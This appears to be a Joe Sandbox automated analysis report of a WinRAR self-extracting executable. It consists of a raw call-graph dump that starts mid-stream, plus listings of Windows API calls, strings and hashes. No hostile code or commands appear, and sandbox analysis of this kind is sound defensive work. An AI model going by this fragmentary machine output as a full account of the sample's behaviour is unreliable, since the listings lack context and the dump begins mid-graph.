cd8e61 23747->23749 23751 cd8e74 23748->23751 23757 cd8e7d __dosmaperr 23748->23757 23780 cd8e06 23749->23780 23754 cd8dcc _free 20 API calls 23751->23754 23752 cd8ea7 HeapReAlloc 23756 cd8e69 23752->23756 23752->23757 23753 cd8e82 23787 cd91a8 20 API calls __dosmaperr 23753->23787 23754->23756 23756->23698 23757->23752 23757->23753 23788 cd7a5e 7 API calls 2 library calls 23757->23788 23766 cba243 23759->23766 23762->23717 23763 cbb6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23763->23724 23764->23733 23765->23732 23774 ccec50 23766->23774 23769 cba23a 23769->23722 23769->23763 23770 cba261 23776 cbbb03 23770->23776 23772 cba275 23772->23769 23773 cba279 GetFileAttributesW 23772->23773 23773->23769 23775 cba250 GetFileAttributesW 23774->23775 23775->23769 23775->23770 23777 cbbb10 _wcslen 23776->23777 23778 cbbbb8 GetCurrentDirectoryW 23777->23778 23779 cbbb39 _wcslen 23777->23779 23778->23779 23779->23772 23781 cd8e44 23780->23781 23782 cd8e14 __dosmaperr 23780->23782 23790 cd91a8 20 API calls __dosmaperr 23781->23790 23782->23781 23784 cd8e2f RtlAllocateHeap 23782->23784 23789 cd7a5e 7 API calls 2 library calls 23782->23789 23784->23782 23785 cd8e42 23784->23785 23785->23756 23787->23756 23788->23757 23789->23782 23790->23785 25510 cce455 14 API calls ___delayLoadHelper2@8 23839 cd7f6e 23840 cd7f7d 23839->23840 23841 cd7f99 23839->23841 23840->23841 23842 cd7f83 23840->23842 23862 cdbb30 23841->23862 23866 cd91a8 20 API calls __dosmaperr 23842->23866 23846 cd7f88 23867 cd9087 26 API calls __cftof 23846->23867 23847 cd7fc4 23868 cd8092 38 API calls 23847->23868 23850 cd7f92 23851 cd7fe1 23869 cd8207 20 API calls 2 library calls 23851->23869 23853 cd7fee 23854 cd7ff7 23853->23854 23855 cd8003 23853->23855 23870 cd91a8 20 API calls __dosmaperr 23854->23870 23871 cd8092 38 API calls 23855->23871 23858 cd8dcc _free 20 API calls 23858->23850 23859 cd8019 23860 cd8dcc _free 20 API calls 23859->23860 23861 cd7ffc 23859->23861 23860->23861 23861->23858 23863 cdbb39 23862->23863 23864 cd7fa0 GetModuleFileNameA 23862->23864 23872 cdba27 23863->23872 23864->23847 23866->23846 23867->23850 23868->23851 23869->23853 23870->23861 23871->23859 23873 cd97e5 _unexpected 38 API calls 23872->23873 23874 cdba34 23873->23874 23892 cdbb4e 23874->23892 23876 cdba3c 23901 cdb7bb 23876->23901 23879 cdba53 23879->23864 23880 cd8e06 __vsnwprintf_l 21 API calls 23881 cdba64 23880->23881 23882 cdba96 23881->23882 23908 cdbbf0 23881->23908 23885 cd8dcc _free 20 API calls 23882->23885 23885->23879 23886 cdba91 23918 cd91a8 20 API calls __dosmaperr 23886->23918 23888 cdbada 23888->23882 23919 cdb691 26 API calls 23888->23919 23889 cdbaae 23889->23888 23890 cd8dcc _free 20 API calls 23889->23890 23890->23888 23893 cdbb5a ___scrt_is_nonwritable_in_current_image 23892->23893 23894 cd97e5 _unexpected 38 API calls 23893->23894 23896 cdbb64 23894->23896 23899 cdbbe8 _abort 23896->23899 23900 cd8dcc _free 20 API calls 23896->23900 23920 cd8d24 38 API calls _abort 23896->23920 23921 cdac31 EnterCriticalSection 23896->23921 23922 cdbbdf LeaveCriticalSection _abort 23896->23922 23899->23876 23900->23896 23902 cd4636 __cftof 38 API calls 23901->23902 23903 cdb7cd 23902->23903 23904 cdb7dc GetOEMCP 23903->23904 23905 cdb7ee 23903->23905 23907 cdb805 23904->23907 23906 cdb7f3 GetACP 23905->23906 23905->23907 23906->23907 23907->23879 23907->23880 23909 cdb7bb 40 API calls 23908->23909 23910 cdbc0f 23909->23910 23912 cdbc85 _abort 23910->23912 23914 cdbc60 IsValidCodePage 23910->23914 23916 cdbc16 23910->23916 23911 ccfbbc CatchGuardHandler 5 API calls 23913 cdba89 23911->23913 23923 cdb893 GetCPInfo 23912->23923 23913->23886 23913->23889 23915 cdbc72 GetCPInfo 23914->23915 23914->23916 23915->23912 23915->23916 23916->23911 23918->23882 23919->23882 23921->23896 23922->23896 23928 cdb8cd 23923->23928 23932 cdb977 23923->23932 23925 ccfbbc CatchGuardHandler 5 API calls 23927 cdba23 23925->23927 23927->23916 23933 cdc988 23928->23933 23931 cdab78 __vsnwprintf_l 43 API calls 23931->23932 23932->23925 23934 cd4636 __cftof 38 API calls 23933->23934 23935 cdc9a8 MultiByteToWideChar 23934->23935 23937 cdca7e 23935->23937 23938 cdc9e6 23935->23938 23939 ccfbbc CatchGuardHandler 5 API calls 23937->23939 23940 cd8e06 __vsnwprintf_l 21 API calls 23938->23940 23943 cdca07 _abort __vsnwprintf_l 23938->23943 23941 cdb92e 23939->23941 23940->23943 23947 cdab78 23941->23947 23942 cdca78 23952 cdabc3 20 API calls _free 23942->23952 23943->23942 23945 cdca4c MultiByteToWideChar 23943->23945 23945->23942 23946 cdca68 GetStringTypeW 23945->23946 23946->23942 23948 cd4636 __cftof 38 API calls 23947->23948 23949 cdab8b 23948->23949 23953 cda95b 23949->23953 23952->23937 23954 cda976 __vsnwprintf_l 23953->23954 23955 cda99c MultiByteToWideChar 23954->23955 23956 cda9c6 23955->23956 23957 cdab50 23955->23957 23960 cd8e06 __vsnwprintf_l 21 API calls 23956->23960 23963 cda9e7 __vsnwprintf_l 23956->23963 23958 ccfbbc CatchGuardHandler 5 API calls 23957->23958 23959 cdab63 23958->23959 23959->23931 23960->23963 23961 cdaa9c 23989 cdabc3 20 API calls _free 23961->23989 23962 cdaa30 MultiByteToWideChar 23962->23961 23964 cdaa49 23962->23964 23963->23961 23963->23962 23980 cdaf6c 23964->23980 23968 cdaaab 23972 cd8e06 __vsnwprintf_l 21 API calls 23968->23972 23975 cdaacc __vsnwprintf_l 23968->23975 23969 cdaa73 23969->23961 23970 cdaf6c __vsnwprintf_l 11 API calls 23969->23970 23970->23961 23971 cdab41 23988 cdabc3 20 API calls _free 23971->23988 23972->23975 23973 cdaf6c __vsnwprintf_l 11 API calls 23976 cdab20 23973->23976 23975->23971 23975->23973 23976->23971 23977 cdab2f WideCharToMultiByte 23976->23977 23977->23971 23978 cdab6f 23977->23978 23990 cdabc3 20 API calls _free 23978->23990 23991 cdac98 23980->23991 23984 cdafdc LCMapStringW 23985 cdaf9c 23984->23985 23986 ccfbbc CatchGuardHandler 5 API calls 23985->23986 23987 cdaa60 23986->23987 23987->23961 23987->23968 23987->23969 23988->23961 23989->23957 23990->23961 23992 cdacc8 23991->23992 23994 cdacc4 23991->23994 23992->23985 23998 cdaff4 10 API calls 3 library calls 23992->23998 23994->23992 23996 cdace8 23994->23996 23999 cdad34 23994->23999 23995 cdacf4 GetProcAddress 23997 cdad04 __dosmaperr 23995->23997 23996->23992 23996->23995 23997->23992 23998->23984 24000 cdad55 LoadLibraryExW 23999->24000 24005 cdad4a 23999->24005 24001 cdad72 GetLastError 24000->24001 24004 cdad8a 24000->24004 24002 cdad7d LoadLibraryExW 24001->24002 24001->24004 24002->24004 24003 cdada1 FreeLibrary 24003->24005 24004->24003 24004->24005 24005->23994 25512 cd8268 55 API calls _free 25513 ccc793 107 API calls 4 library calls 24952 cb9f7a 24953 cb9f88 24952->24953 24954 cb9f8f 24952->24954 24955 cb9f9c GetStdHandle 24954->24955 24957 cb9fab 24954->24957 24955->24957 24956 cba003 WriteFile 24956->24957 24957->24953 24957->24956 24958 cb9fcf 24957->24958 24959 cb9fd4 WriteFile 24957->24959 24961 cba095 24957->24961 24963 cb6baa 78 API calls 24957->24963 24958->24957 24958->24959 24959->24957 24959->24958 24964 cb6e98 77 API calls 24961->24964 24963->24957 24964->24953 25564 cb1f72 128 API calls __EH_prolog 25515 cca070 10 API calls 25517 ccb270 99 API calls 25518 cb1075 84 API calls 24998 cb9a74 24999 cb9a7e 24998->24999 25000 cb9b9d SetFilePointer 24999->25000 25002 cb981a 79 API calls 24999->25002 25003 cb9b79 24999->25003 25004 cb9ab1 24999->25004 25001 cb9bb6 GetLastError 25000->25001 25000->25004 25001->25004 25002->25003 25003->25000 25519 cca400 GdipDisposeImage GdipFree 25520 ccd600 70 API calls 25521 cd6000 QueryPerformanceFrequency QueryPerformanceCounter 25523 cdf200 51 API calls 25567 cd2900 6 API calls 4 library calls 25569 cda700 21 API calls 25572 cb1710 86 API calls 25573 ccad10 73 API calls 25526 cdf421 21 API calls __vsnwprintf_l 25527 ccc220 93 API calls _swprintf 25529 cb1025 29 API calls 25576 ccf530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25577 ccff30 LocalFree 25531 cdc030 GetProcessHeap

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00CC0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00CC087C
                                                                    • Part of subcall function 00CC0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CC088E
                                                                    • Part of subcall function 00CC0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CC08BF
                                                                    • Part of subcall function 00CCA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00CCA655
                                                                    • Part of subcall function 00CCAC16: OleInitialize.OLE32(00000000), ref: 00CCAC2F
                                                                    • Part of subcall function 00CCAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CCAC66
                                                                    • Part of subcall function 00CCAC16: SHGetMalloc.SHELL32(00CF8438), ref: 00CCAC70
                                                                  • GetCommandLineW.KERNEL32 ref: 00CCDF5C
                                                                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00CCDF83
                                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00CCDF94
                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 00CCDFCE
                                                                    • Part of subcall function 00CCDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CCDBF4
                                                                    • Part of subcall function 00CCDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CCDC30
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00CCDFD7
                                                                  • GetModuleFileNameW.KERNEL32(00000000,00D0EC90,00000800), ref: 00CCDFF2
                                                                  • SetEnvironmentVariableW.KERNEL32(sfxname,00D0EC90), ref: 00CCDFFE
                                                                  • GetLocalTime.KERNEL32(?), ref: 00CCE009
                                                                  • _swprintf.LIBCMT ref: 00CCE048
                                                                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00CCE05A
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00CCE061
                                                                  • LoadIconW.USER32(00000000,00000064), ref: 00CCE078
                                                                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00CCE0C9
                                                                  • Sleep.KERNEL32(?), ref: 00CCE0F7
                                                                  • DeleteObject.GDI32 ref: 00CCE130
                                                                  • DeleteObject.GDI32(?), ref: 00CCE140
                                                                  • CloseHandle.KERNEL32 ref: 00CCE183
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                  • API String ID: 3049964643-433059772
                                                                  • Opcode ID: ac171a1e3a2d3bab2d2774489a21302ba450599c18d5a10e21825aea2b35532d
                                                                  • Instruction ID: cf60920f1435703ce0584dea55a6d492229f7f1203bf03ab81a14bf85015aa56
                                                                  • Opcode Fuzzy Hash: ac171a1e3a2d3bab2d2774489a21302ba450599c18d5a10e21825aea2b35532d
                                                                  • Instruction Fuzzy Hash: FB61C271904385AFD320ABA5EC89F7F7BECEB45704F04042DF90AD62A1DA74AA44D772

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 812 cca6c2-cca6df FindResourceW 813 cca7db 812->813 814 cca6e5-cca6f6 SizeofResource 812->814 815 cca7dd-cca7e1 813->815 814->813 816 cca6fc-cca70b LoadResource 814->816 816->813 817 cca711-cca71c LockResource 816->817 817->813 818 cca722-cca737 GlobalAlloc 817->818 819 cca73d-cca746 GlobalLock 818->819 820 cca7d3-cca7d9 818->820 821 cca7cc-cca7cd GlobalFree 819->821 822 cca74c-cca76a call cd0320 CreateStreamOnHGlobal 819->822 820->815 821->820 825 cca76c-cca78e call cca626 822->825 826 cca7c5-cca7c6 GlobalUnlock 822->826 825->826 831 cca790-cca798 825->831 826->821 832 cca79a-cca7ae GdipCreateHBITMAPFromBitmap 831->832 833 cca7b3-cca7c1 831->833 832->833 834 cca7b0 832->834 833->826 834->833
                                                                  APIs
                                                                  • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CCB73D,00000066), ref: 00CCA6D5
                                                                  • SizeofResource.KERNEL32(00000000,?,?,?,00CCB73D,00000066), ref: 00CCA6EC
                                                                  • LoadResource.KERNEL32(00000000,?,?,?,00CCB73D,00000066), ref: 00CCA703
                                                                  • LockResource.KERNEL32(00000000,?,?,?,00CCB73D,00000066), ref: 00CCA712
                                                                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CCB73D,00000066), ref: 00CCA72D
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00CCA73E
                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CCA762
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00CCA7C6
                                                                    • Part of subcall function 00CCA626: GdipAlloc.GDIPLUS(00000010), ref: 00CCA62C
                                                                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CCA7A7
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00CCA7CD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                  • String ID: PNG
                                                                  • API String ID: 211097158-364855578
                                                                  • Opcode ID: 6b6701b8284f18686911e93493fe7c9f24d52ee04d6568e559ce6706999cd381
                                                                  • Instruction ID: 43986ebce505a512dd82ed34ac3ff04f005e58a8df01b8e8d89cb6edc1bf7c7c
                                                                  • Opcode Fuzzy Hash: 6b6701b8284f18686911e93493fe7c9f24d52ee04d6568e559ce6706999cd381
                                                                  • Instruction Fuzzy Hash: CC316C75A00386ABD7109F21EC8CF2F7AB9FB84754B05051DF91587621EB21E944DBA2

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1025 cba69b-cba6bf call ccec50 1028 cba6c1-cba6ce FindFirstFileW 1025->1028 1029 cba727-cba730 FindNextFileW 1025->1029 1030 cba742-cba7ff call cc0602 call cbc310 call cc15da * 3 1028->1030 1032 cba6d0-cba6e2 call cbbb03 1028->1032 1029->1030 1031 cba732-cba740 GetLastError 1029->1031 1036 cba804-cba811 1030->1036 1033 cba719-cba722 1031->1033 1040 cba6fe-cba707 GetLastError 1032->1040 1041 cba6e4-cba6fc FindFirstFileW 1032->1041 1033->1036 1043 cba709-cba70c 1040->1043 1044 cba717 1040->1044 1041->1030 1041->1040 1043->1044 1045 cba70e-cba711 1043->1045 1044->1033 1045->1044 1047 cba713-cba715 1045->1047 1047->1033
                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CBA592,000000FF,?,?), ref: 00CBA6C4
                                                                    • Part of subcall function 00CBBB03: _wcslen.LIBCMT ref: 00CBBB27
                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CBA592,000000FF,?,?), ref: 00CBA6F2
                                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CBA592,000000FF,?,?), ref: 00CBA6FE
                                                                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,00CBA592,000000FF,?,?), ref: 00CBA728
                                                                  • GetLastError.KERNEL32(?,?,?,?,00CBA592,000000FF,?,?), ref: 00CBA734
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                  • String ID:
                                                                  • API String ID: 42610566-0
                                                                  • Opcode ID: 67aeb91e1ec53c1b2a2dc73be235adea6beb897cb5a3e5cbd01b7c9ec2bf0f1a
                                                                  • Instruction ID: 6229537a054aea1a92aeaae16d820bf65edad2ea0a93553e6d5ad051ef315209
                                                                  • Opcode Fuzzy Hash: 67aeb91e1ec53c1b2a2dc73be235adea6beb897cb5a3e5cbd01b7c9ec2bf0f1a
                                                                  • Instruction Fuzzy Hash: 81416D76900555ABCB25DF64CC88BEEB7B8FB48350F14419AE9A9E3240DB346E90DF90
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,?,00CD7DC4,?,00CEC300,0000000C,00CD7F1B,?,00000002,00000000), ref: 00CD7E0F
                                                                  • TerminateProcess.KERNEL32(00000000,?,00CD7DC4,?,00CEC300,0000000C,00CD7F1B,?,00000002,00000000), ref: 00CD7E16
                                                                  • ExitProcess.KERNEL32 ref: 00CD7E28
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentExitTerminate
                                                                  • String ID:
                                                                  • API String ID: 1703294689-0
                                                                  • Opcode ID: d8ad06a31b8889efb8977c61eb3c1d8d67a45c19fba0b77e2e6dbf5c71f2d93f
                                                                  • Instruction ID: 733aa8135f6964d3e6af9e397b9dfc6131145573a22d34420807fc5368a05528
                                                                  • Opcode Fuzzy Hash: d8ad06a31b8889efb8977c61eb3c1d8d67a45c19fba0b77e2e6dbf5c71f2d93f
                                                                  • Instruction Fuzzy Hash: 20E0B631004188EFCF11BF64DD4DB5E7F6AEB50341B004556FA198B632DB3AEE52EA90
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 89cdbeaf2f14197ef91c29662b14e2b5369610e262b9dc24072c91a66e6130fc
                                                                  • Instruction ID: b8cc75b5857fc7ce757afac2f0d9a4f701a8296c180084317e965eb6968b730b
                                                                  • Opcode Fuzzy Hash: 89cdbeaf2f14197ef91c29662b14e2b5369610e262b9dc24072c91a66e6130fc
                                                                  • Instruction Fuzzy Hash: 7282FB70904185AEDF25DF74C895BFABBBDAF05300F0841B9E9599B282DB315B8CDB60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 1e766a45244502e98834be5ce099952e2a1a67bd3b3287df9c9493ebd4119a08
                                                                  • Instruction ID: f9915af60b04b528a7c427c923facc9f1e670ecbe3265edb8e5cfb5e5b3fb7c9
                                                                  • Opcode Fuzzy Hash: 1e766a45244502e98834be5ce099952e2a1a67bd3b3287df9c9493ebd4119a08
                                                                  • Instruction Fuzzy Hash: 5BD1D771A083448FDB14CF28C944B5BBBE5FF89308F08466EE8999B342D774EA45CB56
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00CCB7E5
                                                                    • Part of subcall function 00CB1316: GetDlgItem.USER32(00000000,00003021), ref: 00CB135A
                                                                    • Part of subcall function 00CB1316: SetWindowTextW.USER32(00000000,00CE35F4), ref: 00CB1370
                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CCB8D1
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CCB8EF
                                                                  • IsDialogMessageW.USER32(?,?), ref: 00CCB902
                                                                  • TranslateMessage.USER32(?), ref: 00CCB910
                                                                  • DispatchMessageW.USER32(?), ref: 00CCB91A
                                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00CCB93D
                                                                  • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00CCB960
                                                                  • GetDlgItem.USER32(?,00000068), ref: 00CCB983
                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CCB99E
                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,00CE35F4), ref: 00CCB9B1
                                                                    • Part of subcall function 00CCD453: _wcslen.LIBCMT ref: 00CCD47D
                                                                  • SetFocus.USER32(00000000), ref: 00CCB9B8
                                                                  • _swprintf.LIBCMT ref: 00CCBA24
                                                                    • Part of subcall function 00CB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB40A5
                                                                    • Part of subcall function 00CCD4D4: GetDlgItem.USER32(00000068,00D0FCB8), ref: 00CCD4E8
                                                                    • Part of subcall function 00CCD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00CCAF07,00000001,?,?,00CCB7B9,00CE506C,00D0FCB8,00D0FCB8,00001000,00000000,00000000), ref: 00CCD510
                                                                    • Part of subcall function 00CCD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CCD51B
                                                                    • Part of subcall function 00CCD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CE35F4), ref: 00CCD529
                                                                    • Part of subcall function 00CCD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CCD53F
                                                                    • Part of subcall function 00CCD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CCD559
                                                                    • Part of subcall function 00CCD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CCD59D
                                                                    • Part of subcall function 00CCD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CCD5AB
                                                                    • Part of subcall function 00CCD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CCD5BA
                                                                    • Part of subcall function 00CCD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CCD5E1
                                                                    • Part of subcall function 00CCD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CE43F4), ref: 00CCD5F0
                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CCBA68
                                                                  • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00CCBA90
                                                                  • GetTickCount.KERNEL32 ref: 00CCBAAE
                                                                  • _swprintf.LIBCMT ref: 00CCBAC2
                                                                  • GetLastError.KERNEL32(?,00000011), ref: 00CCBAF4
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00CCBB43
                                                                  • _swprintf.LIBCMT ref: 00CCBB7C
                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00CCBBD0
                                                                  • GetCommandLineW.KERNEL32 ref: 00CCBBEA
                                                                  • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00CCBC47
                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 00CCBC6F
                                                                  • Sleep.KERNEL32(00000064), ref: 00CCBCB9
                                                                  • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00CCBCE2
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00CCBCEB
                                                                  • _swprintf.LIBCMT ref: 00CCBD1E
                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CCBD7D
                                                                  • SetDlgItemTextW.USER32(?,00000065,00CE35F4), ref: 00CCBD94
                                                                  • GetDlgItem.USER32(?,00000065), ref: 00CCBD9D
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00CCBDAC
                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CCBDBB
                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CCBE68
